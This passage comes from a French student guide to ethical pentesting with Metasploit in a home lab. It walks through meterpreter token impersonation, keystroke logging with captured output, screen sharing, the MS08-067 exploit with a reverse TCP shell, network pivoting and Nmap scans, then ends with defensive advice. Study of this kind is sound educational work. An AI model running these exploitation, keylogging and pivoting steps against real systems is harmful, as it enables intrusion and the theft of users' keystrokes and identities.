C'est une extension qui permet l'usurpation d'identité grâce à des « Token ». Ces jetons sont comme les Cookies web, des clés temporaires qui permettent de se connecter en une seule fois et accéder au système et au réseau sans devoir se connecter à chaque fois.

Incognito, profite de cette fonctionnalité de la même manière que le vol de cookies en rejouant cette clé temporaire quand il doit s'authentifier.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Il existe deux sortes de tokens : les délégués et les usurpateurs d'identité. Les jetons de délégué sont créés pour les connexions « interactives », comme la connexion à la machine ou l'utilisation du Remote Desktop pour se connecter. Les jetons d'emprunt d'identité sont créés pour les sessions « non interactives », comme la connexion d'un lecteur réseau, par exemple.

Figure 37 : Changement d'user ID

<u>meterpreter</u> > getuid
Server username: AUTORITE NT\SYSTEM
<pre>meterpreter > impersonate_token MES-0116F59708E\\dfqs</pre>
[+] Delegation token available
[+] Successfully impersonated user MES-0116F59708E\dfqs
<u>meterpreter</u> > getuid
Server username: MES-0116F59708E\dfqs

Tout d'abord, il ne faut pas oublier d'importer *incognito*, car au début de l'exercice j'étais sous « AUTORITE NT/SYSTEM », mais grâce à la commande *impersonate_token <token name>*, j'ai pu changer le UID et avoir celui de MES-0116F59708E\dfqs.

Remarque : pour que le \ soit pris en compte dans le nom du token, il faudra rajouter un \ avant.

11.1.6. Keyscan :

On peut lancer un *keyscan_start*, ce qui commencera un keystroke sniffer, surveillant le clavier de la victime. Il faut attendre un moment puis le fermer avec *keyscan_dump* ensuite cela nous affichera les frappes du clavier qui ont été exécutées entre les deux commandes.

Pour que le module fonctionne correctement quand la session est en train de tourner sous *SYSTEM*, il faut que la session du Meterpreter soit *migrate* sur un processus *explorer, winlogon* ou un PID spécifique : pour cet exemple, Meterpreter a été migré sur le processus *explorer*.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 38 : Keylogger sur Windows XP



11.1.7. Screen share :

Cette fonctionnalité peut être enclenchée avec *screenshare,* ce qui nous ouvrira le navigateur où l'on peut voir l'écran de la victime en temps réel.



Figure 39 : screen share machine windows

11.2. Post/windows/capture/keylog_recorder :

Comme l'indique le titre, ce module se trouve dans le dossier *post* : il est donc possible de l'utiliser seulement une fois la machine pénétrée.

J'utiliserai la faille ms08_067_netapi puis le payload par défaut. Après avoir lancé l'exploitation, il est nécessaire de mettre la session du Meterpreter en arrière-plan avec la commande *background*, puis *search Post/windows/capture/keylog_recorder*, *et*

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

remplir ensuite les options du module en mettant *set migrate true* et *set session <numéro de la session sur laquelle Meterpreter tourne>.*

En lançant l'Exploit avec *exploit* notre module créera un fichier texte en commençant à enregistrer les frappes du clavier. Pour arrêter l'enregistrement, il faut exécuter *ctrl+c*.

8 ouail@KALI-portable: ~ a 110 recorder) > exploit msf6 post(w Session not found Post module execution completed msf6 post() > set session 2 session => 2 <u>msf6</u> post(der) > exploit *] Executing module against MES-0116F59708E Trying explorer.exe (1756) [+] Successfully migrated to Explorer.EXE (1756) as: MES-0116F59708E\dfqs Starting the keylog recorder... [*] Keystrokes being saved in to /home/ouail/.msf4/loot/20210823160602_default _192.168.1.116_host.windows.key_408964.txt Recording keystrokes... ^C[*] User interrupt. [*] Shutting down keylog recorder. Please wait... [*] Post module execution completed rder) > msf6 post(20210823160602_default_192.... Ouvrir 👻 + Enregistrer D X 1 Keystroke log from explorer.exe on MES-0116F59708E with user MES-0116F59708E\dfgs started at 2021-08-23 16:06:02 +0200 2 3 <CR> 4 5 test sur la machine 6 victime dans un fichier tex 7 te<CR> 8 enter<CR> 9 10 supprimer 11 <^H> 12 13 Keylog Recorder exited at 2021-08-23 16:06:52 +0200 14

Figure 40 : Utilisation du keylog_recorder et l'output du résultat

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

11.3. Pivot :

Pour cette méthode, il est nécessaire d'avoir plusieurs machines victimes (Machine V1, Machine V2) ainsi que la machine attaquante (machine A).

Voici les machines Windows :



Figure 41 : adresses des machines cibles

Nous remarquons la présence de deux réseaux, le premier *192.168.1.0 255.255.255.0* est le réseau où se trouve aussi notre machine attaquante (*192.168.1.26*) et les deux machines victimes (*192.168.1.33 et 192.168.1.30*) ; et le deuxième *192.168.233.128* est le réseau local sur lequel on ne trouve que les deux machines Windows (*192.168.233.129 et 192.168.233.128*).

Nous allons vérifier si notre machine attaquante peut voir une des machines sur ce réseau.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 42 : tests ping sur machines victimes

```
msf6 > ping 192.168.1.33
[*] exec: ping 192.168.1.33
PING 192.168.1.33 (192.168.1.33) 56(84) bytes of data.
64 bytes from 192.168.1.33: icmp_seq=1 ttl=128 time=1.63 ms
64 bytes from 192.168.1.33: icmp_seq=2 ttl=128 time=0.874 ms
^с
--- 192.168.1.33 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 0.874/1.249/1.625/0.375 ms
Interrupt: use the 'exit' command to quit
<u>msf6</u> > ping 192.168.233.129
[*] exec: ping 192.168.233.129
PING 192.168.233.129 (192.168.233.129) 56(84) bytes of data.
`C
--- 192.168.233.129 ping statistics ---
34 packets transmitted, 0 received, 100% packet loss, time 33788ms
Interrupt: use the 'exit' command to quit
```

Ici, on remarque que notre machine Kali peut *ping* la machine V1 avec son adresse *192.168.1.33* et pas avec son adresse *192.168.233.129* car c'est un réseau privé et que la machine attaquante n'y appartient pas.



msf6	> search 08-067	n – whatia rp –	n)		- SI 2
Match	ing Modules				
=====	=======				
#	Name	Disclosure Date	Rank	Check	k Description
0	exploit/windows/smb/ms08_067_netapi	2008-10-28	great	Yes	MS08-067 Microsoft Server Service Relative Path Stack Corruption
Inter	act with a module by name or index. F	or example info @), use 0	or use	se exploit/windows/smb/ms08_067_netapi
<u>msf6</u> [*] N msf6 RhOST msf6	<pre>> use 0 o payload configured, defaulting to w exploit(sindows/smb/ms08_067_nstapi) S => 192.168.1.30 exploit(windows/smb/ms08_067_nstapi)</pre>	indows/meterprete > set RhOSTS 192. > exploit	r/rever 168.1.3	se_tcp 0	
[*] S [*] 1 [*] 1 [*] 1 [*] 1 [*] 5 [*] M	tarted reverse TCP handler on 192.168 92.168.1.30:445 - Automatically detec 92.168.1.30:445 - fingerprint: Window 92.168.1.30:445 - Selected Target: Wi 92.168.1.30:445 - Attempting to trigg ending stage (175174 bytes) to 192.16 eterpreter session 1 opened (192.168.	.1.26:4444 ting the target s XP - Service Pa ndows XP SP3 Fren er the vulnerabil 8.1.30 1.26:4444 -> 192.	ick 3 – ich (NX) ity 168.1.3	lang:Fr 0:1037)	French 7) at 2021-09-20 14:27:38 +0200
meter [*] B	<u>preter</u> > background ackgrounding session 1				

Nous allons commencer par attaquer la machine V2 (192.168.1.30) avant de mettre la session meterpreter en *background* comme sur la figure ci-dessus.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Figure 44 : attaque deuxième machine



Ensuite, nous exécuterons la commande : *Route add 192.168.233.129 255.255.255.0 1*, qui nous permet de router un trafic à travers une session déjà ouverte, d'où le 1 à la fin de la commande qui indique la session meterpreter ouverte au préalable.

Dans cette étape de l'attaque nous allons attaquer la deuxième machine en indiquant son adresse IP sur le réseau privé *192.168.233.129* grâce au routage que nous avons exécuté l'attaque était accomplie même si la machine Kali n'est pas dans le réseau privé des deux machines Windows.

Figure	45 :	sessions	meter	preter	ouvertes
	-				

<u>msf6</u>	exploi	t(windows/smb/ms08_067_ne	tapi) > sessions	
Activ =====	e sess =====	ions ====		
Id	Name	Туре	Information	Connection
1 2		meterpreter x86/windows meterpreter x86/windows	AUTORITE NT\SYSTEM @ MES-0116F59708E AUTORITE NT\SYSTEM @ MES-0116F59708E	192.168.1.26:4444 -> 192.168.1.30:1037 (192.168.1.30) 192.168.1.26:4444 -> 192.168.1.33:1038 (192.168.233.129)

Finalement, nous constatons que nous avons deux sessions meterpreter ouvertes, mais surtout que la deuxième a été lancée à partir de l'adresse IP privée de la machine (à la fin de la ligne *192.168.233.129*).

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

12. Mesures à prendre :

Avant toutes ces avancées technologiques, pirater une machine était plus facile à cause des nombreuses failles dans les fichiers des systèmes d'exploitation, par exemple. Cependant, actuellement il est plus difficile de trouver des faiblesses dans les systèmes grâce aux mises à jour qui ne cessent de se moderniser pour renforcer la sécurité. Les hackers se retrouvent dans une situation où ils doivent être plus créatifs pour exploiter les failles, non plus des systèmes d'exploitation, mais des applications et des services installés sur les machines. Ils exploitent beaucoup le manque de savoir chez les utilisateurs non formés dans le domaine de la sécurité informatique, grâce à des techniques de social engineering, qui consistent à appâter un utilisateur à ouvrir une faille, comme un exécutable reçu par mail qui ouvre une backdoor.

Il est donc nécessaire d'abord de former les utilisateurs à une utilisation sécurisée des ordinateurs ainsi qu'à s'assurer que tous les ports non utilisés soient fermés, et que les personnes non qualifiées ne puissent pas modifier ces derniers.

Ensuite, il faut maintenir cette sécurité en mettant à jour les logiciels systèmes ainsi que les applications, sachant que pour ce faire, l'utilisation d'internet ou non n'a pas d'importance. Cependant, le principal est de surveiller l'utilisation, au cas où une personne mal intentionnée réussit à rentrer dans le réseau, afin que l'on puisse au plus vite l'éliminer et trouver le moyen qu'elle a utilisé pour pénétrer notre système et réparer la faille. Pour cela des outils nous seront indispensables, comme *procexp*, qui est un outil sur les machines Windows, et nous permet de voir les processus qui tournent sur nos machines, pour ainsi repérer les processus non voulus qui peuvent être des indicateurs d'intrusion.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Conclusion

Pour résumer, le pentesting est un domaine très fluctuant : il est donc nécessaire de s'informer aussi souvent que possible sur les nouvelles failles et les nouvelles attaques développées, que ce soit dans le but de mieux se protéger ou dans le but de l'exercer de manière éthique.

Or il ne suffit pas de lire des livres pour devenir un expert dans le domaine, loin de là. Il est conseillé, voire indispensable de passer par plusieurs mois/années d'expérimentations : en s'exerçant sur des machines non protégées, puis sur des machines avec un minimum de protection, et ainsi de suite en expérimentant sur des machines de plus en plus sécurisées. Ainsi, comprendre comment certaines attaques fonctionnent et comment interagir en cas d'échec ou d'erreur durant l'attaque.

C'est un domaine vaste qui contient un nombre élevé de types d'attaques différentes. Que ce soit des attaques directes sur les machines ou que ce soit à travers des moyens de social engineering, ou encore des attaques sur les machines Android et IOS et des attaques de type récoltes d'informations, etc.

Il est donc possible de trouver un type qui nous intéresse plus que d'autres et de se focaliser dessus jusqu'à maitriser la matière pour ensuite en explorer d'autres avec les connaissances acquises lors du premier apprentissage.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Bibliographie

WIKIPEDIA, dernière modification le 19 novembre 2020. MetaSploit [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : <u>https://fr.wikipedia.org/wiki/Metasploit</u>

WIKIPEDIA, dernière modification le 2 mars 2021. Kali Linux [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : <u>https://fr.wikipedia.org/wiki/Kali Linux</u>

WIKIPEDIA, dernière modification le 24 juin 2021. Windows XP [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : https://fr.wikipedia.org/wiki/Windows XP#Service Pack 3 (SP3)

RAPID7 [consulté le 28 juillet 2021]. Disponible à l'adresse suivante : https://docs.rapid7.com/metasploit/metasploitable-

2/#:~:text=The%20easiest%20way%20to%20get,and%20other%20common%20virtualization%20platforms.

WIKIPEDIA, dernière modification le 15 avril 2021. VMware [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : https://fr.wikipedia.org/wiki/VMware#VMware Workstation

INFOSECMATTER, [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : <u>https://www.infosecmatter.com/metasploit-module-library/</u>

HOMEPUTERSECURITY, [consulté le 29 juillet 2021]. Disponible à l'adresse suivante : <u>https://homputersecurity.com/2017/10/20/metasploit-quelle-est-la-difference-entre-un-staged-payload-et-un-stageless-payload/</u>

NMAP.ORG, [consulté le 5 août 2021]. Disponible à l'adresse suivante : <u>https://nmap.org/man/fr/man-briefoptions.html</u>

PACKT, [consulté le 7 août 2021]. Disponible à l'adresse suivant : <u>https://subscription.packtpub.com/book/networking and servers/9781786463166/1/ch</u> 01lvl1sec18/vulnerability-analysis-of-vsftpd-2-3-4-backdoor

Vulners, [consulté le 23 août 2021]. Disponible à l'adresse suivant : <u>https://vulners.com/metasploit/MSF:POST/WINDOWS/CAPTURE/KEYLOG_RECORD</u> <u>ER</u>

Rapid7, [consulté le 23 août 2021]. Disponible à l'adresse suivante: <u>https://www.rapid7.com/blog/post/2009/03/22/remote-keystroke-sniffing-with-</u> <u>meterpreter/</u>

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Medium, [Consulté le 23 août 2021]. Disponible à l'adresse suivant : <u>https://medium.com/@mzainkh/how-it-works-reverse-tcp-attack-</u>

<u>d7610dd8e55#:~:text=Reverse_tcp%20is%20basically%20instead%20of,a%20type%2</u> <u>0of%20reverse%20shell</u>.

Hacksland, [consulté le 23 août 2021]. Disponible à l'adresse suivant : <u>https://hacksland.net/reverse-tcp-shell-with-metasploit/</u>

Varonis, [consulté le 25 août 2021]. Disponible à l'adresse suivant : <u>https://blog.varonis.fr/protocole-smb-explication-des-ports-445-et-139/</u>

Exploit-DB, [consulté le 25 août 2021]. Disponible à l'adresse suivante : <u>https://www.Exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-</u> <u>you%E2%80%99II-ever-read.pdf</u>

Wikipedia, [Consulté le 25 août 2021]. Disponible à l'adresse suivant : <u>https://fr.wikipedia.org/wiki/Server_Message_Block#:~:text=Le%20protocole%20SMB</u> %20(Server%20Message,(Common%20Internet%20File%20System).

Webopedia, [consulté le 30 août 2021]. Disponible à l'adresse suivant : <u>https://www.webopedia.com/definitions/use-after-</u>

free/#:~:text=Use%20After%20Free%20specifically%20refers,full%20remote%20code
%20execution%20capabilities.

The Silicon Underground, [Consulté le 31 août 2021]. Disponible à l'adresse suivante : https://dfarq.homeip.net/how-bad-is-ms08-067/

Wonder ho to, [Consulté le 31 août 2021]. Disponible à l'adresse suivant :

https://null-byte.wonderhowto.com/how-to/get-root-filesystem-access-via-sambasymlink-traversal-0198509/

O'Reilly, [Consulté le 9 septembre 2021]. Disponible à l'adresse suivant : https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/4d7912bf-2a5e-4c45-abf4-0d11b38f5e45.xhtml

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Annexe 1 : Fonctionnement NMAP

Savoir utiliser les scanners est primordial pour un pentester, car dans les situations réelles, les adresses IP ainsi que les ports vulnérables ne seront pas faciles à trouver et ne seront pas donnés, comme pour les exercices qui suivront.

Figure 1.1 : Scan réseau avec Nmap



Ici la commande *Nmap -sn (réseau)* a été exécuté en sudo, car une exécution d'un utilisateur sans privilèges manquait quelques machines dans le réseau, il est donc conseillé de l'exécuter en tant que super utilisateur.

La première et la dernière ligne indiquent le début et la fin du scan avec des détails, tels que le moment de l'exécution, la durée du scan, etc.

Entre ces lignes nous trouvons tous les hôtes connectés au réseau scanné. Prenons exemple du 6^{ème} hôte (là où se trouve le smiley), la première ligne indique le nom de la machine suivi de Home, ainsi que son adresse IP, la ligne d'en dessous indique si l'hôte est atteignable avec le temps de latence, et la dernière ligne indique la mac adresse et le service ou dans ce cas la manufacture de la carte réseau.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

Pour l'exemple qui suit, Metasploitable2 (192.168.1.29) a été choisi comme cible pour ses vulnérabilités.

		ouail@KALI-portable: ~	۹	:	-	• ×		
(ouai	L® KAL	I-portable)-[~]						
_\$ <u>sudo</u> nmap 192.168.1.29								
[sudo] Mot de passe de ouail :								
Starting	Starting Nmap 7.91 (https://nmap.org) at 2021-08-05 14:21 CEST							
Nmap sca	n repo	rt for pc-84.home (192.168.1.29)						
Host is	up (0.	0038s Latency).						
Not show	n: 977	closed ports						
PORT	STATE	SERVICE						
21/tcp	open	ttp						
22/tcp	open	ssn +-2t						
23/tcp	open	telnet						
25/tcp	open	smtp						
53/tcp	open	domain						
80/tcp	open							
111/tcp	open							
139/tcp	open	netblos-ssn						
445/tcp	open	microsoft-as						
512/tcp	open	login						
513/tcp	open	login						
1000 /ton	open	SHELL						
1099/ tcp	open	ingreeleck						
20/0/tcp	open	nfc						
2049/ CCP	open	corroxy-ftp						
3306/tcn	open	mysal						
5432/tcn	open	nostgreen]						
5000/tcn	open	vnc						
6000/tcp	open	x11						
6667/tcn	open	irc						
8009/tcp	open	aip13						
8180/tcp	open	unknown						
MAC Addr	ess: Ø	0:0C:29:BD:96:66 (VMware)						
Nmap don	e: 1 I	P address (1 host up) scann <u>ed in 0.3</u>	1 sec	onds				
				andre kristerete.				

Figure 1.2 : Scan de ports d'une machine Metasploitable2

Dans l'exemple ci-dessus, la commande simple de *Nmap (adresse IP de la victime)* a été exécutée en super utilisateur et donnera comme résultat la figure 1.2.

Première et dernière indiquent toujours le début et la fin du scan, le résultat nous indique aussi le nombre de ports fermés dans la machine (977 dans cet exemple).

Puis une liste de ports avec *le numéro de port / protocole de communication*, son état (ouvert pour les ports dans cette liste) et dernièrement le service lié à ce port.

Pour plus de détails nous allons exécuter la commande *Nmap -T4 -A -v (IP de la cible),* les options :

 -T4 : c'est le profil « agressive » qui accélère les scans, car il suppose que nous travaillons sur un réseau suffisamment rapide et efficace, c'est l'option la plus recommandée pour les utilisateurs d'Ethernet ou une connexion large bande, -

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit

T5 « insane » part du principe que le réseau sur lequel nous travaillons est extraordinairement rapide et qu'on accepte le risque de sacrifier un peu de précision pour plus de rapidité, -T0 « paranoid » et -T1 « polite » sont là pour éviter les IDS ⁸et consommer moins de bande passante et moins de ressources sur la machine cible, ce qui donc prendra énormément de temps (pour ces options il est nécessaire de régler les valeurs exactes de timing dont on a besoin). Ces paramètres font en sorte de scanner qu'un seul port à la fois puis attendre 5 minutes (T0), 15 secondes (T1) ou 0.4 seconde (T2) entre chaque envoi de probe.

- -A : ce paramètre permet d'activer la détection du système d'exploitation et des versions, c'est l'option qui nous permet d'avoir les détails dans la figure 1.3.
- -v : il permet à Nmap d'imprimer plus d'informations, cela le rend plus verbeux (vv pour encore plus de détail que -v).
- --version-all : cette option nous permet d'avoir plus d'informations sur les versions du service analysé.

⁸ Système de détection d'intrusion

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit





Ici nous avons plus de détails, par exemple le premier élément de la liste des ports ouverts est le port 21/tcp (comme dans la figure 4), mais ici nous avons les versions des services en plus (ce qui sera utile pour l'attaquant pour mieux exploiter la cible) ainsi que d'autres détails.

Pour avoir une interface utilisateurs plus facile à interpréter il est possible d'utiliser ZENMAP qui contient les mêmes informations ci-dessus, mais sur une interface user friendly.

Constitution d'un guide permettant l'apprentissage éthique du pentesting, en mettant en œuvre le framework MetaSploit